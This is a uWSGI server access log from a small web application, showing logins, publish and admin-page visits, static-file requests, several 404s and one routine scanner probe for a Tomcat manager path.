18965|app: 0|req: 399/581] 180.160.69.32 () {48 vars in 938 bytes} [Sat Jan 9 00:26:51 2021] POST / => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 1) +[pid: 18965|app: 0|req: 400/582] 180.160.69.32 () {40 vars in 835 bytes} [Sat Jan 9 00:26:51 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 401/583] 180.160.69.32 () {40 vars in 837 bytes} [Sat Jan 9 00:26:51 2021] GET /home/ => generated 8154 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 402/584] 115.134.127.94 () {24 vars in 257 bytes} [Sat Jan 9 00:29:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 403/585] 219.228.146.245 () {36 vars in 680 bytes} [Sat Jan 9 00:30:03 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/586] 219.228.146.245 () {38 vars in 729 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/587] 219.228.146.245 () {38 vars in 690 bytes} [Sat Jan 9 00:30:03 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/588] 219.228.146.245 () {38 vars in 707 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/589] 219.228.146.245 () {38 vars in 709 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/590] 219.228.146.245 () {38 vars in 715 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/591] 219.228.146.245 () {38 vars in 711 bytes} [Sat Jan 9 00:30:03 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/592] 219.228.146.245 () {38 vars in 688 bytes} [Sat Jan 9 00:30:03 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/593] 219.228.146.245 () {38 vars in 702 bytes} [Sat Jan 9 00:30:04 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/594] 219.228.146.245 () {38 vars in 694 bytes} [Sat Jan 9 00:30:04 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/595] 219.228.146.245 () {38 vars in 704 bytes} [Sat Jan 9 00:30:04 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/596] 219.228.146.245 () {38 vars in 766 bytes} [Sat Jan 9 00:30:05 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/597] 219.228.146.245 () {38 vars in 734 bytes} [Sat Jan 9 00:30:05 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 404/598] 219.228.146.245 () {48 vars in 892 bytes} [Sat Jan 9 00:30:43 2021] POST / => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 405/599] 219.228.146.245 () {40 vars in 863 bytes} [Sat Jan 9 00:30:43 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 406/600] 219.228.146.245 () {40 vars in 865 bytes} [Sat Jan 9 00:30:43 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 407/601] 219.228.146.245 () {40 vars in 874 bytes} [Sat Jan 9 00:30:46 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 408/602] 219.228.146.245 () {40 vars in 876 bytes} [Sat Jan 9 00:30:46 2021] GET /publish/ => generated 4909 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 409/603] 219.228.146.245 () {40 vars in 878 bytes} [Sat Jan 9 00:30:50 2021] GET /all-0-0-0 => generated 8838 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/604] 219.228.146.245 () {38 vars in 757 bytes} [Sat Jan 9 00:30:51 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/605] 219.228.146.245 () {38 vars in 755 bytes} [Sat Jan 9 00:30:51 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/606] 219.228.146.245 () {38 vars in 854 bytes} [Sat Jan 9 00:30:51 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 410/607] 219.228.146.245 () {40 vars in 880 bytes} [Sat Jan 9 00:30:53 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 411/608] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:30:53 2021] GET /single/6/ => generated 8796 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/609] 219.228.146.245 () {38 vars in 902 bytes} [Sat Jan 9 00:30:53 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[] +[pid: 18965|app: 0|req: 412/610] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:31:11 2021] GET /all-1-0-0 => generated 8473 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 413/611] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:31:13 2021] GET /all-0-0-0 => generated 8838 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 414/612] 219.228.146.245 () {40 vars in 880 bytes} [Sat Jan 9 00:31:14 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 415/613] 219.228.146.245 () {40 vars in 874 bytes} [Sat Jan 9 00:31:48 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 416/614] 219.228.146.245 () {40 vars in 876 bytes} [Sat Jan 9 00:31:48 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 417/615] 219.228.146.245 () {48 vars in 954 bytes} [Sat Jan 9 00:31:59 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 418/616] 219.228.146.245 () {40 vars in 871 bytes} [Sat Jan 9 00:31:59 2021] GET /home/ => generated 8157 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 419/617] 219.228.146.245 () {40 vars in 876 bytes} [Sat Jan 9 00:32:02 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/618] 219.228.146.245 () {38 vars in 817 bytes} [Sat Jan 9 00:35:53 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: 0|req: 420/619] 219.228.146.245 () {40 vars in 872 bytes} [Sat Jan 9 00:36:19 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 421/620] 219.228.146.245 () {48 vars in 954 bytes} [Sat Jan 9 00:36:33 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 422/621] 219.228.146.245 () {40 vars in 871 bytes} [Sat Jan 9 00:36:33 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 423/622] 219.228.146.245 () {40 vars in 876 bytes} [Sat Jan 9 00:36:39 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +一辆豪车 粉色 四轮 +[pid: 18965|app: 0|req: 424/623] 219.228.146.245 () {48 vars in 1058 bytes} [Sat Jan 9 00:39:16 2021] POST /publish/ => generated 0 bytes in 25 msecs (HTTP/1.1 302) 7 headers in 202 bytes (4 switches on core 1) +[pid: 18965|app: 0|req: 425/624] 219.228.146.245 () {42 vars in 910 bytes} [Sat Jan 9 00:39:16 2021] GET /single/7 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 426/625] 219.228.146.245 () {42 vars in 912 bytes} [Sat Jan 9 00:39:16 2021] GET /single/7/ => generated 8331 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/626] 219.228.146.245 () {38 vars in 830 bytes} [Sat Jan 9 00:39:16 2021] GET /static/img/t_photo/7_%E7%8E%A9%E5%85%B7%E8%BD%A6.jpg => generated 23084 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 427/627] 219.228.146.245 () {40 vars in 878 bytes} [Sat Jan 9 00:39:24 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 428/628] 219.228.146.245 () {40 vars in 880 bytes} [Sat Jan 9 00:39:27 2021] GET /all-0-0-0 => generated 9214 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 429/629] 219.228.146.245 () {40 vars in 873 bytes} [Sat Jan 9 00:39:29 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 430/630] 219.228.146.245 () {40 vars in 878 bytes} [Sat Jan 9 00:40:37 2021] GET /all-0-0-0 => generated 9214 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 431/631] 219.228.146.245 () {40 vars in 880 bytes} [Sat Jan 9 00:40:43 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 432/632] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:40:43 2021] GET /single/6/ => generated 8796 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/633] 219.228.146.245 () {38 vars in 902 bytes} [Sat Jan 9 00:40:43 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 18965|app: 0|req: 433/634] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:40:49 2021] GET /single/7/ => generated 8331 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[] +[pid: 18965|app: 0|req: 434/635] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:12 2021] GET /all-1-0-0 => generated 8473 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 435/636] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:14 2021] GET /all-3-0-0 => generated 9214 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 18965|app: 0|req: 436/637] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:19 2021] GET /all-3-0-1 => generated 9214 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 18965|app: 0|req: 437/638] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:21 2021] GET /all-3-0-3 => generated 9214 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +0 +[, ] +[pid: 18965|app: 0|req: 438/639] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:41:22 2021] GET /all-3-0-0 => generated 9214 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 439/640] 219.228.146.245 () {40 vars in 874 bytes} [Sat Jan 9 00:44:45 2021] GET /home/ => generated 8157 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 440/641] 219.228.146.245 () {40 vars in 872 bytes} [Sat Jan 9 00:44:54 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 441/642] 219.228.146.245 () {40 vars in 877 bytes} [Sat Jan 9 00:44:55 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 442/643] 219.228.146.245 () {40 vars in 879 bytes} [Sat Jan 9 00:44:55 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 18965|app: 0|req: 443/644] 219.228.146.245 () {38 vars in 766 bytes} [Sat Jan 9 00:44:55 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 444/645] 219.228.146.245 () {48 vars in 963 bytes} [Sat Jan 9 00:45:02 2021] POST /my-admin/ => generated 27 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 445/646] 219.228.146.245 () {40 vars in 884 bytes} [Sat Jan 9 00:45:02 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 446/647] 219.228.146.245 () {40 vars in 886 bytes} [Sat Jan 9 00:45:02 2021] GET /admin-home/ => generated 9586 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/648] 219.228.146.245 () {38 vars in 795 bytes} [Sat Jan 9 00:45:02 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/649] 219.228.146.245 () {38 vars in 820 bytes} [Sat Jan 9 00:45:02 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/650] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:45:02 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/651] 219.228.146.245 () {38 vars in 783 bytes} [Sat Jan 9 00:45:02 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/652] 219.228.146.245 () {38 vars in 766 bytes} [Sat Jan 9 00:45:02 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/653] 219.228.146.245 () {38 vars in 754 bytes} [Sat Jan 9 00:45:02 2021] GET /static/css/style.css => generated 118751 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/654] 219.228.146.245 () {38 vars in 759 bytes} [Sat Jan 9 00:45:02 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/655] 219.228.146.245 () {38 vars in 735 bytes} [Sat Jan 9 00:45:02 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/656] 219.228.146.245 () {38 vars in 747 bytes} [Sat Jan 9 00:45:03 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/657] 219.228.146.245 () {38 vars in 823 bytes} [Sat Jan 9 00:45:03 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/658] 219.228.146.245 () {38 vars in 745 bytes} [Sat Jan 9 00:45:03 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/659] 219.228.146.245 () {38 vars in 819 bytes} [Sat Jan 9 00:45:03 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 447/660] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 448/661] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 449/662] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 450/663] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 451/664] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 452/665] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 453/666] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:45:04 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 454/667] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:45:04 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 455/668] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:45:04 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 456/669] 182.254.152.219 () {22 vars in 236 bytes} [Sat Jan 9 00:46:36 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html +[pid: 18965|app: 0|req: 457/670] 182.254.152.219 () {24 vars in 302 bytes} [Sat Jan 9 00:46:36 2021] GET /manager/html => generated 3401 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 458/671] 47.242.91.138 () {40 vars in 888 bytes} [Sat Jan 9 00:49:28 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 459/672] 47.242.91.138 () {40 vars in 886 bytes} [Sat Jan 9 00:49:29 2021] GET /kind-manage => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 460/673] 47.242.91.138 () {40 vars in 888 bytes} [Sat Jan 9 00:49:30 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 461/674] 47.242.91.138 () {40 vars in 890 bytes} [Sat Jan 9 00:49:30 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 462/675] 47.242.91.138 () {38 vars in 819 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 463/676] 47.242.91.138 () {38 vars in 799 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 464/677] 47.242.91.138 () {38 vars in 819 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 465/678] 47.242.91.138 () {38 vars in 835 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 466/679] 47.242.91.138 () {38 vars in 831 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 467/680] 47.242.91.138 () {38 vars in 843 bytes} [Sat Jan 9 00:49:31 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 468/681] 47.242.91.138 () {40 vars in 890 bytes} [Sat Jan 9 00:49:31 2021] GET /announcement/ => generated 7409 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 469/682] 47.242.91.138 () {38 vars in 767 bytes} [Sat Jan 9 00:49:32 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 470/683] 47.242.91.138 () {38 vars in 765 bytes} [Sat Jan 9 00:49:33 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 471/684] 47.242.91.138 () {38 vars in 875 bytes} [Sat Jan 9 00:49:35 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 472/685] 219.228.146.245 () {48 vars in 976 bytes} [Sat Jan 9 00:56:35 2021] POST /announcement/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 473/686] 219.228.146.245 () {40 vars in 895 bytes} [Sat Jan 9 00:56:35 2021] GET /announcement/? => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 474/687] 219.228.146.245 () {40 vars in 894 bytes} [Sat Jan 9 00:56:35 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 475/688] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 476/689] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 477/690] 219.228.146.245 () 